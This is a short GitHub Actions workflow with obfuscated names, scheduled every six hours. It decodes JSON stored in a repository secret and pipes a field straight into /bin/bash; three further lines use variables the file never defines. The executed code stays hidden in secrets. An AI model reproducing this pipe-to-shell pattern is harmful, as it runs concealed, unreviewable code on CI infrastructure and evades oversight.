name: weibushuang5678
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weibushuang5678
        env:
          ffum97389: ${{ secrets.ffum97389 }}
        run: |
          echo $ffum97389 | jq -r .uq66 | /bin/bash
          echo $xa1861 | jq -r .dyv19213 | /bin/bash
          echo $nfb0 | jq -r .faey23800 | /bin/bash
          echo $umld7774 | jq -r .xaxo85980 | /bin/bash

